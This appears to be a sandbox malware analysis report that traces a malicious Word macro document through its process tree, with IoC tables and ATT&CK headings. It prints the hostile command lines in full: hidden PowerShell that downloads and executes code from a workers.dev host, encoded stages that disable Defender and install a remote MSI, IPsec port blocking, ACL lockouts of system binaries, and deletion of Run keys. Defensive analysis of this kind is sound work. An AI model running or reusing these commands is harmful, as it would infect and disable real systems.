Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2744	PowerShell.exe
2164	powershell.exe
2912	powershell.exe
2912	powershell.exe
2912	powershell.exe
2912	powershell.exe
2440	powershell.exe
1352	msiexec.exe
1352	msiexec.exe
904	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2744	PowerShell.exe
Token: SeDebugPrivilege	2164	powershell.exe
Token: SeDebugPrivilege	2912	powershell.exe
Token: SeDebugPrivilege	2440	powershell.exe
Token: SeShutdownPrivilege	2440	powershell.exe
Token: SeIncreaseQuotaPrivilege	2440	powershell.exe
Token: SeRestorePrivilege	1352	msiexec.exe
Token: SeTakeOwnershipPrivilege	1352	msiexec.exe
Token: SeSecurityPrivilege	1352	msiexec.exe
Token: SeCreateTokenPrivilege	2440	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	2440	powershell.exe
Token: SeLockMemoryPrivilege	2440	powershell.exe
Token: SeIncreaseQuotaPrivilege	2440	powershell.exe
Token: SeMachineAccountPrivilege	2440	powershell.exe
Token: SeTcbPrivilege	2440	powershell.exe
Token: SeSecurityPrivilege	2440	powershell.exe
Token: SeTakeOwnershipPrivilege	2440	powershell.exe
Token: SeLoadDriverPrivilege	2440	powershell.exe
Token: SeSystemProfilePrivilege	2440	powershell.exe
Token: SeSystemtimePrivilege	2440	powershell.exe
Token: SeProfSingleProcessPrivilege	2440	powershell.exe
Token: SeIncBasePriorityPrivilege	2440	powershell.exe
Token: SeCreatePagefilePrivilege	2440	powershell.exe
Token: SeCreatePermanentPrivilege	2440	powershell.exe
Token: SeBackupPrivilege	2440	powershell.exe
Token: SeRestorePrivilege	2440	powershell.exe
Token: SeShutdownPrivilege	2440	powershell.exe
Token: SeDebugPrivilege	2440	powershell.exe
Token: SeAuditPrivilege	2440	powershell.exe
Token: SeSystemEnvironmentPrivilege	2440	powershell.exe
Token: SeChangeNotifyPrivilege	2440	powershell.exe
Token: SeRemoteShutdownPrivilege	2440	powershell.exe
Token: SeUndockPrivilege	2440	powershell.exe
Token: SeSyncAgentPrivilege	2440	powershell.exe
Token: SeEnableDelegationPrivilege	2440	powershell.exe
Token: SeManageVolumePrivilege	2440	powershell.exe
Token: SeImpersonatePrivilege	2440	powershell.exe
Token: SeCreateGlobalPrivilege	2440	powershell.exe
Token: SeRestorePrivilege	1352	msiexec.exe
Token: SeTakeOwnershipPrivilege	1352	msiexec.exe
Token: SeRestorePrivilege	1352	msiexec.exe
Token: SeTakeOwnershipPrivilege	1352	msiexec.exe
Token: SeRestorePrivilege	1352	msiexec.exe
Token: SeTakeOwnershipPrivilege	1352	msiexec.exe
Token: SeRestorePrivilege	1352	msiexec.exe
Token: SeTakeOwnershipPrivilege	1352	msiexec.exe
Token: SeRestorePrivilege	1352	msiexec.exe
Token: SeTakeOwnershipPrivilege	1352	msiexec.exe
Token: SeRestorePrivilege	1352	msiexec.exe
Token: SeTakeOwnershipPrivilege	1352	msiexec.exe
Token: SeRestorePrivilege	1352	msiexec.exe
Token: SeTakeOwnershipPrivilege	1352	msiexec.exe
Token: SeShutdownPrivilege	1908	powercfg.exe
Token: SeDebugPrivilege	904	powershell.exe
Token: SeTakeOwnershipPrivilege	1384	takeown.exe
Token: SeTakeOwnershipPrivilege	2376	takeown.exe
Token: SeTakeOwnershipPrivilege	1596	takeown.exe
Token: SeTakeOwnershipPrivilege	2648	takeown.exe
Token: SeTakeOwnershipPrivilege	588	takeown.exe
Token: SeTakeOwnershipPrivilege	1696	takeown.exe
Token: SeRestorePrivilege	1352	msiexec.exe
Token: SeTakeOwnershipPrivilege	1352	msiexec.exe
Token: SeRestorePrivilege	1352	msiexec.exe
Token: SeTakeOwnershipPrivilege	1352	msiexec.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3024	WINWORD.EXE

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
3024	WINWORD.EXE
3024	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3024 wrote to memory of 2180	3024	WINWORD.EXE	28
PID 3024 wrote to memory of 2180	3024	WINWORD.EXE	28
PID 3024 wrote to memory of 2180	3024	WINWORD.EXE	28
PID 3024 wrote to memory of 2180	3024	WINWORD.EXE	28
PID 3024 wrote to memory of 2744	3024	WINWORD.EXE	30
PID 3024 wrote to memory of 2744	3024	WINWORD.EXE	30
PID 3024 wrote to memory of 2744	3024	WINWORD.EXE	30
PID 3024 wrote to memory of 2744	3024	WINWORD.EXE	30
PID 2744 wrote to memory of 2164	2744	PowerShell.exe	33
PID 2744 wrote to memory of 2164	2744	PowerShell.exe	33
PID 2744 wrote to memory of 2164	2744	PowerShell.exe	33
PID 2744 wrote to memory of 2164	2744	PowerShell.exe	33
PID 2164 wrote to memory of 2912	2164	powershell.exe	34
PID 2164 wrote to memory of 2912	2164	powershell.exe	34
PID 2164 wrote to memory of 2912	2164	powershell.exe	34
PID 2164 wrote to memory of 2912	2164	powershell.exe	34
PID 2912 wrote to memory of 2440	2912	powershell.exe	35
PID 2912 wrote to memory of 2440	2912	powershell.exe	35
PID 2912 wrote to memory of 2440	2912	powershell.exe	35
PID 2912 wrote to memory of 2440	2912	powershell.exe	35
PID 2440 wrote to memory of 328	2440	powershell.exe	36
PID 2440 wrote to memory of 328	2440	powershell.exe	36
PID 2440 wrote to memory of 328	2440	powershell.exe	36
PID 2440 wrote to memory of 328	2440	powershell.exe	36
PID 328 wrote to memory of 2116	328	csc.exe	37
PID 328 wrote to memory of 2116	328	csc.exe	37
PID 328 wrote to memory of 2116	328	csc.exe	37
PID 328 wrote to memory of 2116	328	csc.exe	37
PID 1352 wrote to memory of 1212	1352	msiexec.exe	39
PID 1352 wrote to memory of 1212	1352	msiexec.exe	39
PID 1352 wrote to memory of 1212	1352	msiexec.exe	39
PID 1352 wrote to memory of 1212	1352	msiexec.exe	39
PID 1352 wrote to memory of 1212	1352	msiexec.exe	39
PID 1352 wrote to memory of 1212	1352	msiexec.exe	39
PID 1352 wrote to memory of 1212	1352	msiexec.exe	39
PID 1352 wrote to memory of 1080	1352	msiexec.exe	41
PID 1352 wrote to memory of 1080	1352	msiexec.exe	41
PID 1352 wrote to memory of 1080	1352	msiexec.exe	41
PID 1352 wrote to memory of 1080	1352	msiexec.exe	41
PID 1352 wrote to memory of 1080	1352	msiexec.exe	41
PID 1352 wrote to memory of 1080	1352	msiexec.exe	41
PID 1352 wrote to memory of 1080	1352	msiexec.exe	41
PID 1080 wrote to memory of 1908	1080	MsiExec.exe	42
PID 1080 wrote to memory of 1908	1080	MsiExec.exe	42
PID 1080 wrote to memory of 1908	1080	MsiExec.exe	42
PID 1080 wrote to memory of 1908	1080	MsiExec.exe	42
PID 1080 wrote to memory of 904	1080	MsiExec.exe	44
PID 1080 wrote to memory of 904	1080	MsiExec.exe	44
PID 1080 wrote to memory of 904	1080	MsiExec.exe	44
PID 1080 wrote to memory of 904	1080	MsiExec.exe	44
PID 1080 wrote to memory of 1840	1080	MsiExec.exe	45
PID 1080 wrote to memory of 1840	1080	MsiExec.exe	45
PID 1080 wrote to memory of 1840	1080	MsiExec.exe	45
PID 1080 wrote to memory of 1840	1080	MsiExec.exe	45
PID 1080 wrote to memory of 2128	1080	MsiExec.exe	48
PID 1080 wrote to memory of 2128	1080	MsiExec.exe	48
PID 1080 wrote to memory of 2128	1080	MsiExec.exe	48
PID 1080 wrote to memory of 2128	1080	MsiExec.exe	48
PID 1080 wrote to memory of 900	1080	MsiExec.exe	50
PID 1080 wrote to memory of 900	1080	MsiExec.exe	50
PID 1080 wrote to memory of 900	1080	MsiExec.exe	50
PID 1080 wrote to memory of 900	1080	MsiExec.exe	50
PID 1080 wrote to memory of 2192	1080	MsiExec.exe	52
PID 1080 wrote to memory of 2192	1080	MsiExec.exe	52

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ID-191304203986.docm"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3024
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2180
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
  PowerShell -nop -exec bypass -w hidden -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAG4AbwBwACAALQBlAHgAZQBjACAAYgB5AHAAYQBzAHMAIAAtAGMAIAAiAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvAGIAbABhAGMAawAtAHMAdQBuAC0AYQAzADMANQAuAGEAcwB5AG8AcgBmAHAAbABtAG4AdgAuAHcAbwByAGsAZQByAHMALgBkAGUAdgAvAG0AbgB3AE8ARABCAHAAdABLADYAagBVAC8AegBLAEoARgBuAGIAbgB6AGUAdQBtADgALwAzADcAZAA0AGYAZABkAGIANgBiAGYAMgBkAGUANgA2ADEAMQBjADYANgA1ADUAYQA1AGMAZAAzADcAOQA3ADIAZgBjADMAMwA2ADQAMgBkAC8AYQBjAGUALgBqAHAAZwAnACkAIgA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADEAOAAwAA0ACgB9AA0ACgA=
  2⤵
  - Process spawned unexpected child process
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2744
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://black-sun-a335.asyorfplmnv.workers.dev/mnwODBptK6jU/zKJFnbnzeum8/37d4fddb6bf2de6611c6655a5cd37972fc33642d/ace.jpg')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2164
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -w hidden -Enc DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADAAOwAkAGkAKwArACkADQAKAHsADQAKAHMAYQBsACAAYQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAOwBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwAkAGcAPQBhACAAUwB5AHMAdABlAG0ALgBEAHIAYQB3AGkAbgBnAC4AQgBpAHQAbQBhAHAAKAAoAGEAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBPAHAAZQBuAFIAZQBhAGQAKAAiAGgAdAB0AHAAOgAvAC8AYgBsAGEAYwBrAC0AcwB1AG4ALQBhADMAMwA1AC4AYQBzAHkAbwByAGYAcABsAG0AbgB2AC4AdwBvAHIAawBlAHIAcwAuAGQAZQB2AC8AbQBuAHcATwBEAEIAcAB0AEsANgBqAFUALwBUADIAcQBvAG0ATgB3AGYARgBVAGUAUwAvADYAMgBmADMAMwAxADkANQA5AGQAZABlADMANwA5AGIAMgA1ADMANgBjAGEAZQBkADIANgBhADcANABhAGUAOAA0ADYAMABjADAAYwAzADAALwBhAGwAbAAuAHAAbgBnACIAKQApADsAJABvAD0AYQAgAEIAeQB0AGUAWwBdACAAMgA1ADYAMAA7ACgAMAAuAC4AMwAxACkAfAAlAHsAZgBvAHIAZQBhAGMAaAAoACQAeAAgAGkAbgAoADAALgAuADcAOQApACkAewAkAHAAPQAkAGcALgBHAGUAdABQAGkAeABlAGwAKAAkAHgALAAkAF8AKQA7ACQAbwBbACQAXwAqADgAMAArACQAeABdAD0AKABbAG0AYQB0AGgAXQA6ADoARgBsAG8AbwByACgAKAAkAHAALgBCAC0AYgBhAG4AZAAxADUAKQAqADEANgApAC0AYgBvAHIAKAAkAHAALgBHACAALQBiAGEAbgBkACAAMQA1ACkAKQB9AH0AOwBJAEUAWAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABvAFsAMAAuAC4AMgA1ADEAMgBdACkAKQA7AE0AcwBpAE0AYQBrAGUAIABoAHQAdABwADoALwAvAGIAbABhAGMAawAtAHMAdQBuAC0AYQAzADMANQAuAGEAcwB5AG8AcgBmAHAAbABtAG4AdgAuAHcAbwByAGsAZQByAHMALgBkAGUAdgAvAG0AbgB3AE8ARABCAHAAdABLADYAagBVAC8ANQBoAHcAdAByAEwAeQB5AEgARgBpAHYALwA3AGIAMAA5ADgANQBjADgANgAxADkAOAA2AGUAYwA5AGUAMgAwADgANwBhAGQAZQA4ADIANwAzAGUANQA0ADQAMAAwADkAZAA2ADgAZQAxAC8AUwBzAGQAeAB4AEkAcAA4AEQAcQBlAFEALgBqAHAAZwA7AFMAdABhAHIAdAAtAFMAbABlAGUAcAAgADEAOAAwAA0ACgB9AA0ACgA=
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2912
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -EncodedCommand DQAKAFMAZQB0AC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEQAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIAAkAHQAcgB1AGUADQAKAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAiACQAZQBuAHYAOgB3AGkAbgBkAGkAcgAiAA0ACgAkAFIAZQBnAGsAZQB5AHAAYQB0AGgAIAA9ACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXAA3AC0AWgBpAHAAIgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AUgB1AG4AdABpAG0AZQAuAEkAbgB0AGUAcgBvAHAAUwBlAHIAdgBpAGMAZQBzADsADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABjAGwAYQBzAHMAIABQAEYAOAA4AGQATgBjAGQAcwBEAEQAcQBlADcAWgBmAA0ACgB7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIALAAgAEMAaABhAHIAUwBlAHQAPQBDAGgAYQByAFMAZQB0AC4AQQB1AHQAbwApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0ACgAcwB0AHIAaQBuAGcAIABwAGEAYwBrAGEAZwBlAFAAYQB0AGgALAAgAHMAdAByAGkAbgBnACAAYwBvAG0AbQBhAG4AZABMAGkAbgBlACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAGkALgBkAGwAbAAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABNAHMAaQBTAGUAdABJAG4AdABlAHIAbgBhAGwAVQBJACgAaQBuAHQAIABkAHcAVQBJAEwAZQB2AGUAbAAsACAASQBuAHQAUAB0AHIAIABwAGgAVwBuAGQAKQA7AA0ACgB9AA0ACgAiAEAADQAKAGQAbwANAAoAewANAAoAJABtAHMAaQBwAGEAdABoAEEAIAA9ACAAIgBoAHQAdABwADoALwAvAGIAbABhAGMAawAtAHMAdQBuAC0AYQAzADMANQAuAGEAcwB5AG8AcgBmAHAAbABtAG4AdgAuAHcAbwByAGsAZQByAHMALgBkAGUAdgAvAG0AbgB3AE8ARABCAHAAdABLADYAagBVAC8ANQBoAHcAdAByAEwAeQB5AEgARgBpAHYALwA3AGIAMAA5ADgANQBjADgANgAxADkAOAA2AGUAYwA5AGUAMgAwADgANwBhAGQAZQA4ADIANwAzAGUANQA0ADQAMAAwADkAZAA2ADgAZQAxAC8AUwBzAGQAeAB4AEkAcAA4AEQAcQBlAFEALgBqAHAAZwAiAA0ACgAkAG0AcwBpAHAAYQB0AGgAQQBMAEwAIAA9ACAAQAAoACIAJABtAHMAaQBwAGEAdABoAEEAIgAsACIAJABtAHMAaQBwAGEAdABoAEEAIgApAA0ACgAkAE4AZABTAFUASQB3AHUAdQBXAG4AcABZAEgAegBGAHUAIAA9ACAAZwBlAHQALQByAGEAbgBkAG8AbQAgACQAbQBzAGkAcABhAHQAaABBAEwATAA7AA0ACgBbAFAARgA4ADgAZABOAGMAZABzAEQARABxAGUANwBaAGYAXQA6ADoATQBzAGkAUwBlAHQASQBuAHQAZQByAG4AYQBsAFUASQAoADIALAAwACkAOwANAAoAWwBQAEYAOAA4AGQATgBjAGQAcwBEAEQAcQBlADcAWgBmAF0AOgA6AE0AcwBpAEkAbgBzAHQAYQBsAGwAUAByAG8AZAB1AGMAdAAoACIAJABOAGQAUwBVAEkAdwB1AHUAVwBuAHAAWQBIAHoARgB1ACIALAAiACIAKQANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAANgAwAA0ACgB9AA0ACgB1AG4AdABpAGwAIAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAFIAZQBnAGsAZQB5AHAAYQB0AGgAIAAtAG4AYQBtAGUAIABTAHQAYQB5AE8AbgBUAG8AcAApAA0ACgA=
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2440
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lqfr9jjd.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:328
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6182.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6181.tmp"
        7⤵
        
        PID:2116

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1352
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding A58E5271C05E15C1A074CEC2FCD04643
  2⤵
  - Loads dropped DLL
  PID:1212
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding C12410DCADC9F4A3DB6386CC3942B759 M Global\MSI0000
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1080
- - C:\Windows\SysWOW64\powercfg.exe
    "C:\Windows\SysWOW64\powercfg.exe" /S 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1908
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -Seconds 900; Restart-Computer -Force
    3⤵
    - Drops file in System32 directory
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:904
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add policy name=qianye
    3⤵
    - Modifies data under HKEY_USERS
    PID:1840
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filterlist name=Filter1
    3⤵
    - Modifies data under HKEY_USERS
    PID:2128
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:900
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:2192
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:2068
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=445 protocol=UDP
    3⤵
    - Modifies data under HKEY_USERS
    PID:1324
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=135 protocol=UDP
    3⤵
    - Modifies data under HKEY_USERS
    PID:1644
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=any dstaddr=Me dstport=139 protocol=UDP
    3⤵
    - Modifies data under HKEY_USERS
    PID:2084
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=2222 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:2568
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=3333 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:1044
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=4444 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:2848
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=5555 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:1160
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=6666 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:1700
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=7777 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:2856
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=8888 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:996
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9000 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:2248
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=9999 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:520
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14443 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:1912
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filter filterlist=Filter1 srcaddr=Me dstaddr=any dstport=14444 protocol=TCP
    3⤵
    - Modifies data under HKEY_USERS
    PID:1528
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add filteraction name=FilteraAtion1 action=block
    3⤵
    - Modifies data under HKEY_USERS
    PID:2508
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static add rule name=Rule1 policy=qianye filterlist=Filter1 filteraction=FilteraAtion1
    3⤵
    - Modifies data under HKEY_USERS
    PID:1252
- - C:\Windows\SysWOW64\netsh.exe
    "C:\Windows\SysWOW64\netsh.exe" ipsec static set policy name=qianye assign=y
    3⤵
    - Modifies data under HKEY_USERS
    PID:552
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\jscript.dll
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1384
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\jscript.dll /E /P everyone:N
    3⤵
    PID:2216
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\jscript.dll
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2376
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\jscript.dll /E /P everyone:N
    3⤵
    PID:872
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\cscript.exe
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1596
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\cscript.exe /E /P everyone:N
    3⤵
    PID:1672
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\cscript.exe
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:2648
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\cscript.exe /E /P everyone:N
    3⤵
    PID:2704
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:588
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /E /P everyone:N
    3⤵
    PID:2540
- - C:\Windows\SysWOW64\takeown.exe
    "C:\Windows\SysWOW64\takeown.exe" /f C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
    3⤵
    - Modifies file permissions
    - Suspicious use of AdjustPrivilegeToken
    PID:1696
- - C:\Windows\SysWOW64\cacls.exe
    "C:\Windows\SysWOW64\cacls.exe" C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe /E /P everyone:N
    3⤵
    PID:1732
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\SysWOW64\reg.exe" delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /va /f
    3⤵
    PID:2944
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\SysWOW64\reg.exe" delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /va /f
    3⤵
    PID:2080
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\SysWOW64\reg.exe" delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg /f
    3⤵
    PID:1720
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\SysWOW64\sc.exe" stop wmiApSrv
    3⤵
    - Launches sc.exe
    PID:1920
- - C:\Windows\SysWOW64\sc.exe
    "C:\Windows\SysWOW64\sc.exe" config wmiApSrv start=disabled
    3⤵
    - Launches sc.exe
    PID:2520

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

